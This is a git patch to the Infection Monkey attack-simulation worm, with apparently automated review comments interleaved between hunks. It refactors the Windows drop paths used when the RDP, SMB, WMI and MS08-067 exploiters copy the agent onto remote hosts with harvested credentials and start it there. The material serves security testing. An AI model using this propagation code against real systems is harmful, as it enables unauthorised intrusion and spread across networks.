From ee23703bfa4b6d48ee55959b2132f78a2382c94b Mon Sep 17 00:00:00 2001
From: Itay Mizeretz
Date: Sun, 4 Mar 2018 17:05:43 +0200
Subject: [PATCH] Monkey now uses different names for 32,64bit on windows. No need to use dropper or rename moneky
---
 infection_monkey/config.py | 11 +++++------
 infection_monkey/example.conf | 4 ++--
 infection_monkey/exploit/rdpgrinder.py | 4 ++--
 infection_monkey/exploit/smbexec.py | 6 +++---
 infection_monkey/exploit/win_ms08_067.py | 8 ++++----
 infection_monkey/exploit/wmiexec.py | 6 +++---
 infection_monkey/windows_upgrader.py | 10 +++++-----
 monkey_island/cc/services/config.py | 21 ++++++++++-----------
 8 files changed, 34 insertions(+), 36 deletions(-)
diff --git a/infection_monkey/config.py b/infection_monkey/config.py
index 0ee609cac..42140172f 100644
--- a/infection_monkey/config.py
+++ b/infection_monkey/config.py
@@ -9,6 +9,7 @@ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter
 SambaCryExploiter, ElasticGroovyExploiter
 from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger
 from network.range import FixedRange
+from windows_upgrader import WindowsUpgrader
 __author__ = 'itamar'
@@ -115,14 +116,12 @@ class Configuration(object):
 dropper_set_date = True
 dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
 dropper_date_reference_path_linux = '/bin/sh'
- dropper_target_path = r"C:\Windows\monkey.exe"
+ dropper_target_path_win_32 = r"C:\Windows\monkey32.exe"
+ dropper_target_path_win_64 = r"C:\Windows\monkey64.exe"
 dropper_target_path_linux = '/tmp/monkey'
- ###########################
- # Windows upgrader config
- ###########################
-
- windows_upgrader_temp_path = r"C:\Windows\monkey64.exe"
+ def get_dropper_target_path_win(self):
+ return self.dropper_target_path_win_64 if WindowsUpgrader.is_64bit_python() else self.dropper_target_path_win_32
 ###########################
 # Kill file
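Review bot: The new module-level `from windows_upgrader import WindowsUpgrader` at the top of config.py forms an import cycle, because windows_upgrader.py itself does `from config import WormConfiguration` (visible in that file's hunk later in this patch); whether it raises depends on which module is imported first, so the import belongs inside the method: `def get_dropper_target_path_win(self):` / `from windows_upgrader import WindowsUpgrader  # local import: windows_upgrader imports config` / `return self.dropper_target_path_win_64 if WindowsUpgrader.is_64bit_python() else self.dropper_target_path_win_32`. Separately, the method chooses between the two paths by the bitness of the interpreter it runs in, while its callers in rdpgrinder.py, smbexec.py, win_ms08_067.py and wmiexec.py use the result as the path on the remote host; if the file copied there (`src_path`) is selected by other criteria, the file name and the architecture of the file can disagree, which the method should state in a docstring such as `"""Return the Windows drop path for the bitness of the running interpreter, not of the remote host."""`. The `Configuration` class starts before this hunk and continues after it.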
diff --git a/infection_monkey/example.conf b/infection_monkey/example.conf
index 8acf8729f..9cc036981 100644
--- a/infection_monkey/example.conf
+++ b/infection_monkey/example.conf
@@ -22,8 +22,8 @@
 "dropper_log_path_windows": "%temp%\\~df1562.tmp",
 "dropper_log_path_linux": "/tmp/user-1562",
 "dropper_set_date": true,
- "dropper_target_path": "C:\\Windows\\monkey.exe",
- "windows_upgrader_temp_path": "C:\\Windows\\monkey64.exe",
+ "dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
+ "dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
 "dropper_target_path_linux": "/tmp/monkey",
diff --git a/infection_monkey/exploit/rdpgrinder.py b/infection_monkey/exploit/rdpgrinder.py
index 606f44f90..fb4d0f32d 100644
--- a/infection_monkey/exploit/rdpgrinder.py
+++ b/infection_monkey/exploit/rdpgrinder.py
@@ -278,11 +278,11 @@ class RdpExploiter(HostExploiter):
 if self._config.rdp_use_vbs_download:
 command = RDP_CMDLINE_HTTP_VBS % {
- 'monkey_path': self._config.dropper_target_path,
+ 'monkey_path': self._config.get_dropper_target_path_win(),
 'http_path': http_path,
 'parameters': cmdline}
 else:
 command = RDP_CMDLINE_HTTP_BITS % {
- 'monkey_path': self._config.dropper_target_path,
+ 'monkey_path': self._config.get_dropper_target_path_win(),
 'http_path': http_path,
 'parameters': cmdline}
 user_password_pairs = self._config.get_exploit_user_password_pairs()
diff --git a/infection_monkey/exploit/smbexec.py b/infection_monkey/exploit/smbexec.py
index b76a7bce6..717810bf9 100644
--- a/infection_monkey/exploit/smbexec.py
+++ b/infection_monkey/exploit/smbexec.py
@@ -57,7 +57,7 @@ class SmbExploiter(HostExploiter):
 # copy the file remotely using SMB
 remote_full_path = SmbTools.copy_file(self.host, src_path,
- self._config.dropper_target_path,
+ self._config.get_dropper_target_path_win(),
 user,
 password,
 lm_hash,
@@ -85,9 +85,9 @@ class SmbExploiter(HostExploiter):
 return False
 # execute the remote dropper in case the path isn't final
- if remote_full_path.lower() != self._config.dropper_target_path.lower():
+ if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
 cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
- build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path)
+ build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
 else:
 cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
 build_monkey_commandline(self.host, get_monkey_depth() - 1)
diff --git a/infection_monkey/exploit/win_ms08_067.py b/infection_monkey/exploit/win_ms08_067.py
index 51393ea69..b29012d47 100644
--- a/infection_monkey/exploit/win_ms08_067.py
+++ b/infection_monkey/exploit/win_ms08_067.py
@@ -214,7 +214,7 @@ class Ms08_067_Exploiter(HostExploiter):
 # copy the file remotely using SMB
 remote_full_path = SmbTools.copy_file(self.host, src_path,
- self._config.dropper_target_path,
+ self._config.get_dropper_target_path_win(),
 self._config.ms08_067_remote_user_add,
 self._config.ms08_067_remote_user_pass)
@@ -223,7 +223,7 @@ class Ms08_067_Exploiter(HostExploiter):
 for password in self._config.exploit_password_list:
 remote_full_path = SmbTools.copy_file(self.host, src_path,
- self._config.dropper_target_path,
+ self._config.get_dropper_target_path_win(),
 "Administrator", password)
 if remote_full_path:
@@ -233,9 +233,9 @@ class Ms08_067_Exploiter(HostExploiter):
 return False
 # execute the remote dropper in case the path isn't final
- if remote_full_path.lower() != self._config.dropper_target_path.lower():
+ if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
 cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
- build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path)
+ build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
 else:
 cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
 build_monkey_commandline(self.host, get_monkey_depth() - 1)
diff --git a/infection_monkey/exploit/wmiexec.py b/infection_monkey/exploit/wmiexec.py
index 1a77a7347..0db4be6ef 100644
--- a/infection_monkey/exploit/wmiexec.py
+++ b/infection_monkey/exploit/wmiexec.py
@@ -77,7 +77,7 @@ class WmiExploiter(HostExploiter):
 # copy the file remotely using SMB
 remote_full_path = SmbTools.copy_file(self.host, src_path,
- self._config.dropper_target_path,
+ self._config.get_dropper_target_path_win(),
 user,
 password,
 lm_hash,
@@ -88,9 +88,9 @@ class WmiExploiter(HostExploiter):
 wmi_connection.close()
 return False
 # execute the remote dropper in case the path isn't final
- elif remote_full_path.lower() != self._config.dropper_target_path.lower():
+ elif remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
 cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
- build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path)
+ build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
 else:
 cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
 build_monkey_commandline(self.host, get_monkey_depth() - 1)
diff --git a/infection_monkey/windows_upgrader.py b/infection_monkey/windows_upgrader.py
index 994a17f96..c63b64524 100644
--- a/infection_monkey/windows_upgrader.py
+++ b/infection_monkey/windows_upgrader.py
@@ -10,7 +10,7 @@ import monkeyfs
 from config import WormConfiguration
 from control import ControlClient
 from exploit.tools import build_monkey_commandline_explicitly
-from model import DROPPER_CMDLINE_WINDOWS
+from model import MONKEY_CMDLINE_WINDOWS
 __author__ = 'itay.mizeretz'
@@ -45,15 +45,15 @@ class WindowsUpgrader(object):
 monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)
 with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:
 monkey_bin = downloaded_monkey_file.read()
- with open(WormConfiguration.windows_upgrader_temp_path, 'wb') as written_monkey_file:
+ with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file:
 written_monkey_file.write(monkey_bin)
 depth = int(opts.depth) if opts.depth is not None else None
 monkey_options = build_monkey_commandline_explicitly(
- opts.parent, opts.tunnel, opts.server, depth, WormConfiguration.dropper_target_path)
+ opts.parent, opts.tunnel, opts.server, depth)
- monkey_cmdline = DROPPER_CMDLINE_WINDOWS % {
- 'dropper_path': WormConfiguration.windows_upgrader_temp_path} + monkey_options
+ monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {
+ 'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options
 monkey_process = subprocess.Popen(monkey_cmdline, shell=True, stdin=None, stdout=None, stderr=None,
diff --git a/monkey_island/cc/services/config.py b/monkey_island/cc/services/config.py
index 981319db4..3001ed768 100644
--- a/monkey_island/cc/services/config.py
+++ b/monkey_island/cc/services/config.py
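Review bot: The new `with open(WormConfiguration.dropper_target_path_win_64, 'wb')` line writes to the final 64-bit location with no handling for a file that already exists or is held open by an earlier 64-bit instance, so a failed write propagates out of this method and the `subprocess.Popen` below is never reached; confirm the caller expects that, since the enclosing method starts and ends outside this hunk. Because the written file is now launched directly through `MONKEY_CMDLINE_WINDOWS` rather than via the dropper, the upgrade path also skips whatever the dropper does with the file (the `dropper_set_date` and `dropper_date_reference_path_windows` options in config.py suggest it is more than a copy), which is presumably intended but deserves a comment such as `# the 64-bit binary is written to its final path and started directly; the dropper is not used for the upgrade`. The configured path is interpolated into a `shell=True` command line, so if `MONKEY_CMDLINE_WINDOWS` does not quote `%(monkey_path)s`, a configured path containing spaces would break the launch; the format string lives in model.py, outside this patch.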
@@ -350,14 +350,7 @@ SCHEMA = {
 "type": "integer",
 "default": 60,
 "description": "Time to keep tunnel open before going down after last exploit (in seconds)"
- },
- "windows_upgrader_temp_path": {
- "title": "Temporary upgrade path for 64bit monkey on Windows",
- "type": "string",
- "default": "C:\\Windows\\monkey64.exe",
- "description": "Determines where should the dropper place the 64 bit monkey while" " upgrading on a Windows machine"
- },
+ }
 }
 },
 "classes": {
@@ -447,10 +440,16 @@ SCHEMA = {
 "default": "/tmp/monkey",
 "description": "Determines where should the dropper place the monkey on a Linux machine"
 },
- "dropper_target_path": {
- "title": "Dropper target path on Windows",
+ "dropper_target_path_win_32": {
+ "title": "Dropper target path on Windows (32bit)",
 "type": "string",
- "default": "C:\\Windows\\monkey.exe",
+ "default": "C:\\Windows\\monkey32.exe",
+ "description": "Determines where should the dropper place the monkey on a Windows machine"
+ },
+ "dropper_target_path_win_64": {
+ "title": "Dropper target path on Windows (64bit)",
+ "type": "string",
+ "default": "C:\\Windows\\monkey64.exe",
 "description": "Determines where should the dropper place the monkey on a Windows machine"
 },
 "dropper_try_move_first": {
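Review bot: The two new schema entries `dropper_target_path_win_32` and `dropper_target_path_win_64` carry an identical `"description"` string, so only the title tells an operator which binary lands where; suggest `"description": "Determines where should the dropper place the 32 bit monkey on a Windows machine"` for the first and the matching `64 bit` wording for the second. The removed `windows_upgrader_temp_path` entry in the first hunk was the only place the schema described the upgrade flow, and windows_upgrader.py now writes to `dropper_target_path_win_64`, so the 64-bit entry's description should also mention that this path is used when a 32-bit monkey upgrades itself. The `SCHEMA` dict starts before these hunks and continues after them.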